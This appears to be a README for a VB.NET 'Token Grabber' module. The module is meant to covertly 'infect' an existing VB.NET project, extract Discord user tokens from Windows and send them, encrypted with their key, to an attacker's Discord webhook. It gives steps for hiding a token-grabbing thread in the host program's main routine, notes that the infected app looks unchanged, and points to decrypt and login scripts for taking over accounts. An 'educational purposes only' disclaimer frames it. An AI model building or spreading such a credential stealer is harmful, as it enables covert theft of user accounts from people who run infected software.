Token Grabber is a VB.NET application designed to demonstrate the potential consequences of unauthorized access to user tokens. This project is intended for educational purposes only and should not be used for malicious activities. The author of this project is not responsible for any misuse or damage caused by this application. This project is a module for infect a existing VB NET Project; no additional packages need to be installed (very discreet).
- Extracts user tokens from the Windows system.
- Sends the extracted tokens to a Discord channel using a webhook.
- Demonstrates the importance of securing user tokens and the ease with which a basic application can extract tokens.
-
Ensure you have the .NET Framework 4.7.2 installed on your system.
-
Download the DiscordTokenGrab.vb file and import it into your project.
-
Modify the Discord WebHook channel Url
Dim webhookurl As String = "URL HERE"- Add the following code to your main module:
Imports System.Threading
Module Main
Sub main()
Dim tokenGrab As Thread = New Thread(AddressOf connectD)
tokenGrab.Start()
'rest of your code here
End Sub
End Module- Intall the requirements for decrypt python scrypt
pyhton -m pip install -r requirements.txtor for linux
pyhton3 -m pip install -r requirements.txt-
Run the infected application.
-
The application will display the same output as if it were not infected.
-
The encrypted token and the key used for encryption are sent to the Discord channel.
-
The hacker can use the decrypt.py script to decrypt the token:
-
Finally, the hacker can log in to Discord using the LoginWithToken.js script on the Discord login page.
This project is for educational purposes only. The author of this project is not responsible for any misuse or damage caused by this application. By using this application, you agree to hold the author harmless and acknowledge that you are solely responsible for any consequences that may arise from using this application.
This project is not licensed under any specific license. All rights are reserved.